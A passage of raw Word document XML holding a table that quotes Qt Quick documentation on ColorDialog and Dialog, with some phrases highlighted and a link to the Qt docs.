              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1789" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Item</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>or inside a</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1790" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Window</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, the dialog </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>will appear centered over the window containing the item, or over the Window that you declared</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="404244"/>
                <w:sz w:val="29"/>
                <w:szCs w:val="29"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The implementation of</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1791" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">will be a </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>platform color dialog if possible</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. If that isn't possible, </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>then it will try</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to instantiate a</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1792" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QColorDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. If that also isn't </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">possible, </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>then it will</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> fall back to a QML implementation, </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DefaultColorDialog.qml</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. In that case you can customize the appearance by </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>editing this file</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. DefaultColorDialog.qml </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>contains</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> a Rectangle to hold the dialog's contents, because certain embedded systems do not support multiple top-level windows. When the dialog becomes visible, it will automatically be wrapped in a Window if possible, or simply reparented on top of the main window if there can only be one window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00763692" w:rsidRPr="002230B8" w:rsidTr="008F1DE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00763692" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Dialog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00490E7E" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1793" w:history="1">
              <w:r w:rsidR="00763692" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>://</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>doc</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qt</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>io</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qt</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>-5/</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qml</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>-</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qtquick</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>-</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>dialogs</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>-</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>dialog</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidR="00763692" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00763692" w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8080" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00763692" w:rsidP="00763692">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">A </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>generic </w:t>
            </w:r>
            <w:hyperlink r:id="rId1794" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QtQuick</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> dialog wrapper</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> with standard buttons.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00763692" w:rsidRPr="00763692" w:rsidRDefault="00763692" w:rsidP="00763692">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>purpose</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of Dialog is </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to wrap arbitrary content</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> into a </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>dialog window</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> including a </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>row of platform-tailored buttons</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00763692" w:rsidRPr="00763692" w:rsidRDefault="00763692" w:rsidP="00763692">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The </w:t>
            </w:r>
            <w:hyperlink r:id="rId1795" w:anchor="contentItem-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>contentItem</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the default property (the </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>only allowed child element</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">), and items declared inside the Dialog </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>will actually be children of another Item inside the contentItem</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. The row of </w:t>
            </w:r>
            <w:hyperlink r:id="rId1796" w:anchor="standardButtons-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>standardButtons</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> will also be inside contentItem below the declared content, and Dialog will attempt to size itself to fit the content and the buttons.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00763692" w:rsidRPr="00763692" w:rsidRDefault="00763692" w:rsidP="00763692">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Alternatively it is possible </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to bind </w:t>
            </w:r>
            <w:hyperlink r:id="rId1797" w:anchor="contentItem-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>contentItem</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> to a custom Item</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, in which case there will be no buttons, no margins, and the custom content will fill the whole dialog. </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
